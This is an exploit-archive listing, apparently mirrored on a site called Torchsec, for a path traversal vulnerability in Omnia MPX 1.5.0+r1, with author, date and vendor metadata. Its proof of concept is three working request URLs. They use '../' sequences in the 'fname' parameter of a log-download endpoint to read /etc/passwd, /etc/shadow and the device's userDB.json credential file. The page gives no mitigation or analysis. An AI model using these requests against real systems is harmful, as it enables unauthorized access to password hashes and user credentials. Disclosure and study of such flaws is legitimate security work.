Omnia MPX 1.5.0+r1 Path Traversal – Torchsec
- Omnia MPX 1.5.0+r1 Path Traversal
- Posted Aug 1, 2022
- Authored by Momen Eldawakhly
-
Omnia MPX version 1.5.0+r1 suffers from a path traversal vulnerability.
- SHA-256 |
255a6f7727bdeaa16975148c3367339b2e812a601460e5e6e74bd1dfbe0dd441 - Download | Favorite | View
# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
# Date: 24/7/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.telosalliance.com/
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
# Version: 1.5.0+r1
# Tested on: MacOS
# PoC:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadowUser Database:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
Gloss